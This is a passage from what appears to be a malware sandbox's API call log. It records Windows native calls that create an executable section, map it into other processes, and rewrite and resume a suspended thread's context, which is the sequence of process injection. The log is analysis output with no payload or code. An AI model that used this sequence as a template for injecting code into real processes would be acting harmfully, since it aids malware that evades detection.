[240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.579] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0137.579] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x18c200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x18d000) returned 0x0 [0137.587] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x18c200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2b80000, SectionOffset=0x0, ViewSize=0xde6e8*=0x18d000) returned 0x0 [0137.616] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0137.625] NtClose (Handle=0x1a8) returned 0x0 [0137.625] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x2c7000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2c79717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.628] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0137.628] NtClose (Handle=0x1a4) returned 0x0 [0137.628] NtClose (Handle=0x1a0) returned 0x0 [0137.629] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x112c, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0137.629] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0137.629] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0137.629] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x204000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0137.630] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0137.632] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1130) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0137.632] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0137.632] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2800000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0137.662] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x204000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0137.763] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0137.763] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xf7200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0xf8000) returned 0x0 [0137.768] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xf7200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x630000, SectionOffset=0x0, ViewSize=0xde6e8*=0xf8000) returned 0x0 [0137.990] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0137.994] NtClose (Handle=0x1a8) returned 0x0 [0137.994] NtSetContextThread (ThreadHandle=0x1a4, 